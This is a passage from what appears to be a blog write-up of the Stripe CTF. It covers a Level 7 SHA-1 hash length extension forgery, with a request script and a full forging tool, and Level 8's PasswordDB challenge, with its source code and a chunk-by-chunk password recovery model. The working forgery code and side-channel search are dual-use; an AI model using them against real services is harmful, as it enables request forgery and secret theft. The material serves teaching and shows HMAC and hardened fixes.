This idea is known as a Hash Length Extension Attack. The one thing we must get right is pad(A): the 0x80 byte, the zero bytes and the 64-bit length that SHA-1 itself appended when it hashed A, which means we need to know len(A). Here A is secret + raw_params, and initialize_db.py shows the secret comes from rand_alnum(14), so its length is 14 bytes. The padding bytes become part of our forged raw_params, which is why the request below contains a \x80 followed by a run of \x00.


Now what I want is to append <strong>&amp;user_id=1&amp;waffle=liege&amp;</strong> to the end of <strong>raw_params</strong>, so that these new values overwrite the previous ones when the server parses the body (the last occurrence of a parameter wins), making the whole request:
<blockquote>count=1&amp;lat=100&amp;user_id=5&amp;long=100&amp;waffle=eggo&amp;user_id=1&amp;waffle=liege&amp;|sig:</blockquote>
Why wouldn't I just replace them? Because I can only compute a valid signature for data appended after what is already signed, not for a modified request. Applying the idea above with a small piece of code, the new request becomes the following (note that the signed part here already carries user_id=1, so only &amp;waffle=liege has to be appended after the padding):
<blockquote>count=10&amp;lat=37.351&amp;user_id=1&amp;long=-119.827&amp;waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&amp;waffle=liege|sig:5fe73d0cbd3b4e82f9b87970041851d232e757cd</blockquote>
Those \x00 above denote a character with the ASCII value zero; since I cannot type them on a terminal, I used the following Python code snippet to send the request to the server:
<blockquote>
<pre>import requests

# raw body: the signed prefix, the SHA-1 glue padding (\x80, zero bytes, bit length),
# the appended parameter, and the forged signature
body = "count=10&amp;lat=37.351&amp;user_id=1&amp;long=-119.827&amp;waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&amp;waffle=liege|sig:5fe73d0cbd3b4e82f9b87970041851d232e757cd"

# post it as the raw body so the NUL bytes survive untouched
resp = requests.post("https://level07-2.stripe-ctf.com/user-cyusirmzyz/orders", data=body)
print resp.text</pre>
</blockquote>
This nice little code would output the flag for the next challenge!
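To make the attack concrete, here is an added example (my code, not the write-up's script and not the level's source) that implements SHA-1 with a resumable state, forges a signature for an appended parameter, and checks it against both the level's sha1(secret + raw_params) verifier and a real HMAC. It is Python 3; the 14-character secret is constructed for the demo (the level's secrets come from rand_alnum(14), and only their length matters to the attacker), and parse_params is an assumed last-value-wins parser standing in for whatever the server does with the body.

```python
import hashlib
import hmac
import struct

# SHA-1 initial state words (FIPS 180-4).
SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def _compress(state, block):
    """Run one SHA-1 compression of a 64-byte block into the five-word state."""
    w = list(struct.unpack('>16I', block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = ((_rotl(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF,
                         a, _rotl(b, 30), c, d)
    return tuple((s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d, e)))


def sha1_padding(total_len):
    """Bytes SHA-1 appends to a total_len-byte message: 0x80, zeros up to
    56 mod 64, then the message length in bits as a 64-bit big-endian int."""
    return (b'\x80' + b'\x00' * ((55 - total_len) % 64)
            + struct.pack('>Q', total_len * 8))


def sha1(data, state=SHA1_IV, prior_len=0):
    """Hex SHA-1 of data. With state and prior_len given, resume a hash whose
    first prior_len bytes (a multiple of the block size) produced state."""
    assert prior_len % 64 == 0
    msg = data + sha1_padding(prior_len + len(data))
    for off in range(0, len(msg), 64):
        state = _compress(state, msg[off:off + 64])
    return ''.join('%08x' % v for v in state)


def self_check(data):
    """True if the hand-written SHA-1 agrees with hashlib on data."""
    return sha1(data) == hashlib.sha1(data).hexdigest()


def length_extend(message, sig_hex, secret_len, suffix):
    """Given sig_hex = sha1(secret + message) and only len(secret), return
    (message + glue + suffix, sha1(secret + message + glue + suffix))."""
    glue = sha1_padding(secret_len + len(message))
    state = struct.unpack('>5I', bytes.fromhex(sig_hex))  # digest == final state
    consumed = secret_len + len(message) + len(glue)       # a block multiple
    return message + glue + suffix, sha1(suffix, state, consumed)


def verify_prefix_mac(secret, raw_params, sig):
    """The level's check: sha1(secret + raw_params) compared with sig."""
    return hashlib.sha1(secret + raw_params).hexdigest() == sig


def verify_hmac(secret, raw_params, sig):
    """The fix: HMAC-SHA1 with a constant-time comparison."""
    expected = hmac.new(secret, raw_params, hashlib.sha1).hexdigest()
    return hmac.compare_digest(expected, sig)


def parse_params(raw):
    """Assumed server-side parsing: the last value for a name wins."""
    return dict(part.split('=', 1) for part in raw.split('&'))


def run_demo(secret=b'Zq8LmN3pV7sT1x'):  # constructed 14-char secret
    message = b'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo'
    suffix = b'&waffle=liege'
    logged_sig = hashlib.sha1(secret + message).hexdigest()  # a genuine signature
    forged, forged_sig = length_extend(message, logged_sig, len(secret), suffix)
    hmac_sig = hmac.new(secret, message, hashlib.sha1).hexdigest()
    _, forged_hmac = length_extend(message, hmac_sig, len(secret), suffix)
    return {
        'prefix_mac_accepts_forgery': verify_prefix_mac(secret, forged, forged_sig),
        'hmac_accepts_forgery': verify_hmac(secret, forged, forged_hmac),
        'waffle_seen_by_server': parse_params(forged.decode('latin-1'))['waffle'],
        'glue': forged[len(message):len(forged) - len(suffix)],
    }


if __name__ == '__main__':
    for key, value in run_demo().items():
        print(key, repr(value))
```

Running it shows the prefix-MAC verifier accepting the forged body while HMAC rejects the same trick, and that the glue between eggo and &amp;waffle=liege is exactly the \x80, 56 zero bytes and \x02( visible in the request above: 14 + 55 = 69 bytes is 552 = 0x228 bits.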

<h3><strong>Challenge 8 &#8211; Networking Side Channel Attack</strong></h3>

You completed this level in 98035.439 seconds. The password was <code>165774000681</code>.

The solution you submitted was:

<code>took a looong time! lots of scripts all there on server2</code>

<hr />

Welcome to the final level, Level 8.

HINT 1: No, really, we&#8217;re not looking for a timing attack.

HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?

UPDATE: If you push the reset button, you will be bounced to a new <code>level08</code> machine. Note that this will change the value of your Flag. If you push reset on Level 2, you will similarly be bounced to a new Level 2 machine.

Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You&#8217;ve recently learned that the Flag itself is protected in a PasswordDB instance, accessible at <strong><a href="https://level08-4.stripe-ctf.com/user-stsqneospz/" target="_blank">https://level08-4.stripe-ctf.com/user-stsqneospz/</a></strong>.

PasswordDB exposes a simple JSON API. You just <code>POST</code> a payload of the form <code>{"password": "password-to-check", "webhooks": ["mysite.com:3000", ...]}</code> to PasswordDB, which will respond with a <code>{"success": true}</code> or <code>{"success": false}</code> to you and your specified webhook endpoints.

(For example, try running <code>curl https://level08-4.stripe-ctf.com/user-stsqneospz/ -d '{"password": "password-to-check", "webhooks": []}'</code>.)

In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers&#8217; respective existences. Instead, the password is &#8220;chunked&#8221; across multiple processes, called &#8220;chunk servers&#8221;. These may live on the same machine as the HTTP-accepting &#8220;primary server&#8221;, or for added security may live on a different machine. PasswordDB comes with built-in security features such as timing attack prevention and protection against using inequitable amounts of CPU time (relative to other PasswordDB instances on the same machine).

As a secure cherry on top, the machine hosting the primary server has very locked down network access. It can only make outbound requests to other <code>stripe-ctf.com</code> servers. As you learned in Level 5, someone forgot to internally firewall off the high ports from the Level 2 server. (It&#8217;s almost like someone on the inside is helping you — there&#8217;s an <a href="http://linux.about.com/od/commands/l/blcmdl8_sshd.htm">sshd</a> running on the Level 2 server as well.)

To maximize adoption, usability is also a goal of PasswordDB. Hence a launcher script, <code>password_db_launcher</code>, has been created for the express purpose of securing the Flag. It validates that your password looks like a valid Flag and automatically spins up 4 chunk servers and a primary server.

You can obtain the code for PasswordDB from <code>git clone https://level08-4.stripe-ctf.com/user-stsqneospz/level08-code</code>, or simply read the source below.
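The description above is all this write-up gives about Level 8 (the submitted note only says the scripts live on another server), so what follows is an added model of the design weakness, not the author's solution and not PasswordDB's code. It assumes an equal 3-digit split (common.chunkPassword is not shown on the page), a primary that queries its chunk servers in order and stops at the first mismatch, and an attacker who can learn how many chunk servers were consulted for a request; that counter stands in for whatever side channel the level exposes, which this page does not describe. It shows why splitting a secret into independently checked pieces collapses a 10^12 search into at most 4 × 10^3 queries.

```python
import itertools

CHUNK_COUNT = 4     # password_db_launcher starts 4 chunk servers
FLAG_LEN = 12       # validatePassword insists on a 12-digit flag
DIGITS = '0123456789'


def chunk_password(count, password):
    """Equal split into count pieces (an assumption: common.chunkPassword is
    not shown on the page)."""
    size = len(password) // count
    return [password[i * size:(i + 1) * size] for i in range(count)]


class ChunkServer:
    """Holds one piece of the flag and answers only for that piece."""
    def __init__(self, chunk):
        self._chunk = chunk

    def check(self, candidate_chunk):
        return candidate_chunk == self._chunk


class PrimaryServer:
    """Assumed behaviour: asks chunk servers in order, stops at the first
    mismatch, and returns only success or failure to the caller. The
    chunks_consulted counter models the side channel; how the real level
    leaks that count is not described on this page."""
    def __init__(self, password):
        self.chunk_servers = [ChunkServer(c)
                              for c in chunk_password(CHUNK_COUNT, password)]
        self.chunks_consulted = 0

    def check(self, candidate):
        self.chunks_consulted = 0
        pieces = chunk_password(CHUNK_COUNT, candidate)
        for server, piece in zip(self.chunk_servers, pieces):
            self.chunks_consulted += 1
            if not server.check(piece):
                return False
        return True


def recover_flag(primary):
    """Fix one chunk at a time. A guessed chunk is right when either the whole
    check succeeds or the primary went on to consult the next server."""
    size = FLAG_LEN // CHUNK_COUNT
    known = ''
    queries = 0
    for index in range(CHUNK_COUNT):
        for guess in itertools.product(DIGITS, repeat=size):
            piece = ''.join(guess)
            candidate = (known + piece).ljust(FLAG_LEN, '0')
            queries += 1
            success = primary.check(candidate)
            if success or primary.chunks_consulted > index + 1:
                known += piece
                break
        else:
            raise RuntimeError('no chunk matched; the model assumptions are off')
    return known, queries


def worst_case_queries():
    """Upper bound with the oracle versus a blind search of all 12 digits."""
    return CHUNK_COUNT * 10 ** (FLAG_LEN // CHUNK_COUNT), 10 ** FLAG_LEN


if __name__ == '__main__':
    flag, used = recover_flag(PrimaryServer('165774000681'))  # the flag quoted above
    print(flag, used, worst_case_queries())
```

With the page's own flag the search needs 1624 queries (166 + 775 + 1 + 682, one chunk at a time) against a bound of 4000, which is why the challenge text's "timing attack prevention" is beside the point: any signal that reveals how far the chunk chain was walked is enough.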

The contents of <code>password_db_launcher</code>:
<table>
<tbody>
<tr>
<td>
<pre>#!/usr/bin/env python
import atexit
import logging
import optparse
import os
import os.path
import random
import re
import signal
import socket
import subprocess
import sys
import time

import common

logger = logging.getLogger('password_db')
logger.addHandler(logging.StreamHandler(sys.stderr))

processes = []

def launch(script, *args):
    path = os.path.join(os.path.dirname(__file__), script)
    args = [path] + list(args)
    launched = subprocess.Popen(args)
    logger.info('Launched %r (pid %d)' % (args, launched.pid))
    processes.append(launched)
    return launched

def nukeChildren():
    logger.info('Killing all remaining children')
    for process in processes:
        try:
            os.kill(process.pid, signal.SIGTERM)
        except OSError:
            pass
        else:
            logger.info('Killed child %s' % process.pid)

def waitChildren():
    os.wait()

def passwordSpecToPassword(password_spec):
    if password_spec and password_spec[0] == '@':
        password_file = password_spec[1:]
        logger.info('Reading password from %s' % password_file)
        return open(password_file).read()
    else:
        return password_spec

def validatePassword(password):
    if not re.search('^\d{12}$', password):
        raise ValueError("Invalid password! The Flag is a 12-digit number.")

def socket_exists(host, port):
    logger.info('Checking whether %s:%s is reachable' % (host, port))
    try:
        socket.create_connection([host, port])
    except socket.error:
        return False
    else:
        return True

def find_open_port(base_port):
    while socket_exists('127.0.0.1', base_port):
        base_port += 1
    return base_port

def wait_until(condition, *args):
    for i in xrange(10):
        if condition(*args):
            return
        else:
            logger.info('Condition not yet true, waiting 0.35 seconds'
                        ' (try %s/%s)' % (i+1, 10))
            time.sleep(0.35)
    raise RuntimeError('Timed out waiting for condition')

def main():
    """
    Spins up a secure configuration of PasswordDB:

    - Uses 4 chunk servers
    - Validates that the Flag itself looks correct
    """

    usage = """%prog [-q ...] &lt;password_spec&gt; &lt;primary_address&gt;

primary_address should be of the form 'host:port' or 'unix:/path/to/socket'"""
    parser = optparse.OptionParser(usage)
    parser.add_option('-q', '--quiet', help='Quietness of debugging output.',
                      dest='quiet', action='count', default=0)
    opts, args = parser.parse_args()
    if not opts.quiet:
        logger.setLevel(logging.DEBUG)
    elif opts.quiet == 1:
        logger.setLevel(logging.INFO)
    elif opts.quiet &gt;= 2:
        logger.setLevel(logging.WARN)

    if len(args) != 2:
        parser.print_usage()
        return 1

    password_spec = args[0]
    primary_host_spec = args[1]

    atexit.register(nukeChildren)

    password = passwordSpecToPassword(password_spec)
    validatePassword(password)

    chunk_count = 4
    chunks = common.chunkPassword(chunk_count, password)

    base_port = random.randint(1024, 20000)
    chunk_hosts = []
    for i in xrange(chunk_count):
        port = find_open_port(base_port)
        base_port = port + 1
        chunk_hosts.append(['127.0.0.1', port])

    for host_port, password_chunk in zip(chunk_hosts, chunks):
        host, port = host_port
        launch('chunk_server', '%s:%s' % (host, port), password_chunk)

    time.sleep(0.35)

    # Make sure everything is booted before starting the primary server
    for host_port in chunk_hosts:
        host, port = host_port
        wait_until(socket_exists, host, port)

    args = []
    args.append('-l')
    args.append('/tmp/primary.lock')
    for host, port in chunk_hosts:
        args.append('-c')
        args.append('%s:%s' % (host, port))
    args.append(primary_host_spec)
    launch('primary_server', *args)

    waitChildren()
    return 0

if __name__ == '__main__':
    sys.exit(main())</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>primary_server</code>:
<table>
<tbody>
<tr>
<td>
<pre>#!/usr/bin/env python
import fcntl
import logging
import json
import optparse
import sys
import time
import traceback

from twisted.internet import reactor

# Local project
import common

logger = logging.getLogger('password_db')
logger.addHandler(logging.StreamHandler(sys.stderr))

class PrimaryProcessor(common.PayloadProcessor):
    def __init__(self, request, chunk_servers):
        super(PrimaryProcessor, self).__init__(request)
        self.chunk_servers = chunk_servers

    def process(self, data):
        Shield.registerLocker()

        password = self.getArg(data, 'password')
        webhooks = self.getArg(data, 'webhooks')

        self.start_time = time.time()

        self.remaining_chunk_servers = self.chunk_servers[:]
        self.remaining_chunks = self.chunkPassword(password)

        self.webhooks = [common.parseHost(webhook) for webhook in webhooks]

        self.checkNext()

    def checkNext(self):
        assert(len(self.remaining_chunks) == len(self.remaining_chunk_servers))

        if not self.remaining_chunk_servers:
            self.sendResult(True)
            return

        next_chunk_server = self.remaining_chunk_servers.pop(0)
        next_chunk = self.remaining_chunks.pop(0)

        self.log_info('Making request to chunk server %r'
                      ' (remaining chunk servers: %r)' %
                      (next_chunk_server, self.remaining_chunk_servers))

        common.makeRequest(next_chunk_server,
                           {'password_chunk' : next_chunk},
                           self.nextServerCallback,
                           self.nextServerErrback)

    def nextServerCallback(self, data):
        parsed_data = json.loads(data)
        # Chunk was wrong!
        if not parsed_data['success']:
            # Defend against timing attacks
            remaining_time = self.expectedRemainingTime()
            self.log_info('Going to wait %s seconds before responding' %
                          remaining_time)
            reactor.callLater(remaining_time, self.sendResult, False)
            return

        self.checkNext()

    def expectedRemainingTime(self):
        assert(len(self.chunk_servers) &gt; len(self.remaining_chunk_servers))
        elapsed_time = time.time() - self.start_time
        ratio_remaining_to_elapsed = (len(self.remaining_chunk_servers) * 1.0
            / (len(self.chunk_servers) - len(self.remaining_chunk_servers)))
        return ratio_remaining_to_elapsed * elapsed_time

    def nextServerErrback(self, address_spec, error):
        backtrace = traceback.format_exc(error)
        self.log_error('Error while connecting to chunk server %r: %s (%r)' %
                       (address_spec, error, backtrace))
        self.respondWithMessage('Error! This should never happen in '
                                'production, but it seems that it did. Contact'
                                ' us at ctf@stripe.com to let us know.')

    def sendResult(self, success):
        result = {'success': success}
        self.respond(result)
        for webhook in self.webhooks:
            self.sendWebhook(webhook, result)

    def sendWebhook(self, webhook_host_spec, result):
        self.log_info('Sending webhook to %r: %s' %
                      (webhook_host_spec, result))
        common.makeRequest(webhook_host_spec, result, self.sendWebhookCallback,
                           self.sendWebhookErrback)

    def sendWebhookCallback(self, data):
        # Too late to do anything here
        pass

    def sendWebhookErrback(self, address_spec, error):
        backtrace = traceback.format_exc(error)
        self.log_error('Error while connecting to webhook server %r: %s (%r)' %
                       (address_spec, error, backtrace))

    def chunkPassword(self, password):
        return common.chunkPassword(len(self.chunk_servers), password, self)

class Shield(object):
    # Ensure equitable distribution of load among many PasswordDB
    # instances on a single server. (Typically servers come with many
    # PasswordDB instances.)
    @classmethod
    def registerLocker(self):
        if self.has_lock:
            return

        self.acquireLock()
        reactor.callLater(self.lock_period, self.releaseLock)

    @classmethod
    def acquireLock(self):
        logger.info('Acquiring lock')
        fcntl.flock(self.lockfile, fcntl.LOCK_EX)
        self.has_lock = True

    @classmethod
    def releaseLock(self):
        logger.info('Releasing lock')
        fcntl.flock(self.lockfile, fcntl.LOCK_UN)
        self.has_lock = False

    @classmethod
    def openLockfile(self, path):
        self.lock_period = 0.250
        self.has_lock = False
        self.lockfile = open(path, 'w')

def main():
    usage = """
%prog -c CHUNK_SERVER [-c CHUNK_SERVER ...] [-q ...] -l /path/to/lockfile PRIMARY_SERVER

CHUNK_SERVER:
    A chunk server to spin up as &lt;chunk_host:chunk_port&gt;

PRIMARY_SERVER:
    Either pass a host:port pair &lt;primary_host:primary_port&gt; or pass a
    unix:-prefixed path for it to listen on a UNIX socket
    &lt;unix:/path/to/socket&gt; (useful for running under FastCGI).
"""
    parser = optparse.OptionParser(usage)
    parser.add_option('-q', '--quiet', help='Quietness of debugging output.',
                      dest='quiet', action='count', default=0)
    parser.add_option('-c', '--chunk-servers',
                      help='Add a chunk server to spin up',
                      dest='chunk_servers', action='append', default=[])
    parser.add_option('-l', '--lock-file',
                      help='Path to lockfile',
                      dest='lockfile')
    opts, args = parser.parse_args()
    if not opts.quiet:
        logger.setLevel(logging.DEBUG)
    elif opts.quiet == 1:
        logger.setLevel(logging.INFO)
    elif opts.quiet &gt;= 2:
        logger.setLevel(logging.WARN)

    if len(args) != 1:
        parser.print_usage()
        return 1

    if not opts.chunk_servers:
        parser.print_usage()
        return 1

    if not opts.lockfile:
        parser.print_usage()
        return 1

    Shield.openLockfile(opts.lockfile)

    chunk_servers = [common.parseHost(spec) for spec in opts.chunk_servers]

    server = common.HTTPServer(PrimaryProcessor, chunk_servers)

    spec = args[0]
    if common.isUnix(spec):
        path = common.parseUnix(spec)
        common.listenUNIX(path, server)
    else:
        address_spec = common.parseHost(args[0])
        common.listenTCP(address_spec, server)

    reactor.run()
    return 0

if __name__ == '__main__':
    sys.exit(main())</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>chunk_server</code>:
<table>
<tbody>
<tr>
<td>
<pre>#!/usr/bin/env python
import logging
import optparse
import sys

from twisted.internet import reactor

# Local project
import common

logger = logging.getLogger('password_db')
logger.addHandler(logging.StreamHandler(sys.stderr))

class ChunkProcessor(common.PayloadProcessor):
    def __init__(self, request, password_chunk):
        super(ChunkProcessor, self).__init__(request)
        self.password_chunk = password_chunk

    def process(self, data):
        chunk = self.getArg(data, 'password_chunk')
        success = chunk == self.password_chunk
        self.respond({
                'success' : success
                })

def main():
    usage = """%prog [-q ...] &lt;host:port&gt; &lt;password_chunk&gt;"""
    parser = optparse.OptionParser(usage)
    parser.add_option('-q', '--quiet', help='Quietness of debugging output.',
                      dest='quiet', action='count', default=0)
    opts, args = parser.parse_args()
    if not opts.quiet:
        logger.setLevel(logging.DEBUG)
    elif opts.quiet == 1:
        logger.setLevel(logging.INFO)
    elif opts.quiet &gt;= 2:
        logger.setLevel(logging.WARN)

    if len(args) != 2:
        parser.print_usage()
        return 1

    address_spec = common.parseHost(args[0])
    password_chunk = args[1]

    server = common.HTTPServer(ChunkProcessor, password_chunk)
    common.listenTCP(address_spec, server)
    reactor.run()

    return 0

if __name__ == '__main__':
    sys.exit(main())</pre>
</td>
</tr>
</tbody>
</table>
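An added example (my own code, not part of the level's sources) that models the exchange between <code>primary_server</code> and <code>chunk_server</code> above in plain Python 3 without Twisted, and places the sequential chunk check beside a hardened variant that contacts every chunk server whatever the guess. The equal-size chunking and the direct-call transport are assumptions; the sample flag is constructed.

```python
"""Offline model of PasswordDB's primary/chunk-server check.

Assumptions (mine, not the project's): the password is split into
equal-length chunks, one per chunk server, and each chunk server answers
{'success': bool} exactly as chunk_server does. Network I/O is replaced
by direct method calls so the exchange can be observed and tested.
"""
import hmac


def chunk_password(chunk_count, password):
    """Split password into chunk_count equal-length pieces (assumed layout)."""
    if len(password) % chunk_count:
        raise ValueError('password length must be a multiple of chunk_count')
    size = len(password) // chunk_count
    return [password[i * size:(i + 1) * size] for i in range(chunk_count)]


class ChunkServer:
    """Stand-in for chunk_server: holds one chunk and answers 'success'."""

    def __init__(self, password_chunk):
        self.password_chunk = password_chunk.encode()

    def process(self, data):
        # chunk_server uses '=='; compare_digest keeps the comparison time
        # independent of where the first mismatching byte sits.
        ok = hmac.compare_digest(data['password_chunk'].encode(),
                                 self.password_chunk)
        return {'success': ok}


class SequentialPrimary:
    """Mirrors PrimaryProcessor.checkNext: stop at the first wrong chunk.

    The number of chunk servers contacted equals (matching prefix + 1), so
    the primary's observable work depends on the guess. This is the
    per-request difference that expectedRemainingTime tries to mask.
    """

    def __init__(self, chunk_servers):
        self.chunk_servers = chunk_servers

    def check(self, password):
        chunks = chunk_password(len(self.chunk_servers), password)
        contacted = 0
        for server, chunk in zip(self.chunk_servers, chunks):
            contacted += 1
            if not server.process({'password_chunk': chunk})['success']:
                return {'success': False, 'servers_contacted': contacted}
        return {'success': True, 'servers_contacted': contacted}


class HardenedPrimary:
    """Always asks every chunk server, then combines the answers.

    Right or wrong, every guess costs the same number of requests, so there
    is no early-exit difference left to pad with a delay.
    """

    def __init__(self, chunk_servers):
        self.chunk_servers = chunk_servers

    def check(self, password):
        chunks = chunk_password(len(self.chunk_servers), password)
        results = [server.process({'password_chunk': chunk})['success']
                   for server, chunk in zip(self.chunk_servers, chunks)]
        return {'success': all(results), 'servers_contacted': len(results)}


SECRET = '123456789012'   # constructed sample flag: 12 digits, 4 chunks of 3
SERVERS = [ChunkServer(c) for c in chunk_password(4, SECRET)]


def leak_profile(primary_cls, guesses):
    """Chunk servers contacted per guess. A deployment check: the list
    should be constant if the primary's work does not vary with the guess."""
    primary = primary_cls(SERVERS)
    return [primary.check(g)['servers_contacted'] for g in guesses]


if __name__ == '__main__':
    guesses = ['000000000000', '123000000000', '123456000000', SECRET]
    print('sequential:', leak_profile(SequentialPrimary, guesses))  # [1, 2, 3, 4]
    print('hardened:  ', leak_profile(HardenedPrimary, guesses))    # [4, 4, 4, 4]
```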
The contents of <code>common.py</code>:
<table>
<tbody>
<tr>
<td title="double click to toggle">
<pre><a name="n1" href="https://stripe-ctf.com/levels/8#n1"></a>1
<a name="n121" href="https://stripe-ctf.com/levels/8#n121"></a>121
<a name="n122" href="https://stripe-ctf.com/levels/8#n122"></a>122
<a name="n123" href="https://stripe-ctf.com/levels/8#n123"></a>123
<a name="n124" href="https://stripe-ctf.com/levels/8#n124"></a>124
<a name="n125" href="https://stripe-ctf.com/levels/8#n125"></a>125
<a name="n126" href="https://stripe-ctf.com/levels/8#n126"></a>126
<a name="n127" href="https://stripe-ctf.com/levels/8#n127"></a>127
<a name="n128" href="https://stripe-ctf.com/levels/8#n128"></a>128
<a name="n129" href="https://stripe-ctf.com/levels/8#n129"></a>129
<strong><a name="n130" href="https://stripe-ctf.com/levels/8#n130"></a>130</strong>
<a name="n131" href="https://stripe-ctf.com/levels/8#n131"></a>131
<a name="n132" href="https://stripe-ctf.com/levels/8#n132"></a>132
<a name="n133" href="https://stripe-ctf.com/levels/8#n133"></a>133
<a name="n134" href="https://stripe-ctf.com/levels/8#n134"></a>134
<a name="n135" href="https://stripe-ctf.com/levels/8#n135"></a>135
<a name="n136" href="https://stripe-ctf.com/levels/8#n136"></a>136
<a name="n137" href="https://stripe-ctf.com/levels/8#n137"></a>137
<a name="n138" href="https://stripe-ctf.com/levels/8#n138"></a>138
<a name="n139" href="https://stripe-ctf.com/levels/8#n139"></a>139
<strong><a name="n140" href="https://stripe-ctf.com/levels/8#n140"></a>140</strong>
<a name="n141" href="https://stripe-ctf.com/levels/8#n141"></a>141
<a name="n142" href="https://stripe-ctf.com/levels/8#n142"></a>142
<a name="n143" href="https://stripe-ctf.com/levels/8#n143"></a>143
<a name="n144" href="https://stripe-ctf.com/levels/8#n144"></a>144
<a name="n145" href="https://stripe-ctf.com/levels/8#n145"></a>145
<a name="n146" href="https://stripe-ctf.com/levels/8#n146"></a>146
<a name="n147" href="https://stripe-ctf.com/levels/8#n147"></a>147
<a name="n148" href="https://stripe-ctf.com/levels/8#n148"></a>148
<a name="n149" href="https://stripe-ctf.com/levels/8#n149"></a>149
<strong><a name="n150" href="https://stripe-ctf.com/levels/8#n150"></a>150</strong>
<a name="n151" href="https://stripe-ctf.com/levels/8#n151"></a>151
<a name="n152" href="https://stripe-ctf.com/levels/8#n152"></a>152
<a name="n153" href="https://stripe-ctf.com/levels/8#n153"></a>153
<a name="n154" href="https://stripe-ctf.com/levels/8#n154"></a>154
<a name="n155" href="https://stripe-ctf.com/levels/8#n155"></a>155
<a name="n156" href="https://stripe-ctf.com/levels/8#n156"></a>156
<a name="n157" href="https://stripe-ctf.com/levels/8#n157"></a>157
<a name="n158" href="https://stripe-ctf.com/levels/8#n158"></a>158
<a name="n159" href="https://stripe-ctf.com/levels/8#n159"></a>159
<strong><a name="n160" href="https://stripe-ctf.com/levels/8#n160"></a>160</strong>
<a name="n161" href="https://stripe-ctf.com/levels/8#n161"></a>161
<a name="n162" href="https://stripe-ctf.com/levels/8#n162"></a>162
<a name="n163" href="https://stripe-ctf.com/levels/8#n163"></a>163
<a name="n164" href="https://stripe-ctf.com/levels/8#n164"></a>164</pre>
</td>
<td>
<pre>import atexit
import json
import logging
import os

from twisted.internet import reactor, protocol
from twisted.protocols import basic

from twisted.web import server, resource, client

logger = logging.getLogger('password_db.common')

class Halt(Exception):
    pass

class HTTPServer(object, resource.Resource):
    isLeaf = True

    def __init__(self, processor, args):
        self.processor = processor
        self.args = args

    def render_GET(self, request):
        return ('{"success": false, "message": "GET not supported.'
                ' Try POSTing instead."}\n')

    def render_POST(self, request):
        processor_instance = self.processor(request, self.args)
        processor_instance.processRaw()
        return server.NOT_DONE_YET

class PayloadProcessor(object):
    request_count = 0

    def __init__(self, request):
        PayloadProcessor.request_count += 1
        self.request_id = PayloadProcessor.request_count
        self.request = request

    def processRaw(self):
        raw_data = self.request.content.read()
        self.log_info('Received payload: %r', raw_data)

        try:
            parsed = json.loads(raw_data)
        except ValueError as e:
            self.respondWithMessage('Could not parse message: %s' % e)
            return

        try:
            self.process(parsed)
        except Halt:
            pass

    # API method
    def process(self, data):
        raise NotImplementedError

    # Utility methods
    def getArg(self, data, name):
        try:
            return data[name]
        except KeyError:
            self.respondWithMessage('Missing required param: %s' % name)
            raise Halt()

    def respondWithMessage(self, message):
        response = {
            'success' : False,
            'message' : message
            }
        self.respond(response)

    def respond(self, response):
        if self.request.notifyFinish():
            self.log_error("Request already finished!")
        formatted = json.dumps(response) + '\n'
        self.log_info('Responding with: %r', formatted)
        self.request.write(formatted)
        self.request.finish()

    def log_info(self, *args):
        self.log('info', *args)

    def log_error(self, *args):
        self.log('error', *args)

    def log(self, level, msg, *args):
        # Make this should actually be handled by a formatter.
        client = self.request.client
        try:
            host = client.host
            port = client.port
        except AttributeError:
            prefix = '[%r:%d] '  % (client, self.request_id)
        else:
            prefix = '[%s:%d:%d] '  % (host, port, self.request_id)
        method = getattr(logger, level)
        interpolated = msg % args
        method(prefix + interpolated)

def chunkPassword(chunk_count, password, request=None):
    # Equivalent to ceil(password_length / chunk_count)
    chunk_size = (len(password) + chunk_count - 1) / chunk_count

    chunks = []
    for i in xrange(0, len(password), chunk_size):
        chunks.append(password[i:i+chunk_size])

    while len(chunks) &lt; chunk_count:
        chunks.append('')

    msg = 'Split length %d password into %d chunks of size about %d: %r'
    args = [len(password), chunk_count, chunk_size, chunks]
    if request:
        request.log_info(msg, *args)
    else:
        logger.info(msg, *args)

    return chunks

def isUnix(spec):
    return spec.startswith('unix:')

def parseHost(host):
    host, port = host.split(':')
    port = int(port)
    return host, port

def parseUnix(unix):
    path = unix[len('unix:'):]
    return path

def makeRequest(address_spec, data, callback, errback):
    # Change the signature of the errback
    def wrapper(error):
        errback(address_spec, error)

    host, port = address_spec
    factory = client.HTTPClientFactory('/',
                                       agent='PasswordChunker',
                                       method='POST',
                                       postdata=json.dumps(data))
    factory.deferred.addCallback(callback)
    factory.deferred.addErrback(wrapper)
    reactor.connectTCP(host, port, factory)

def listenTCP(address_spec, http_server):
    host, port = address_spec
    site = server.Site(http_server)
    reactor.listenTCP(port, site, 50, host)

def cleanupSocket(path):
    try:
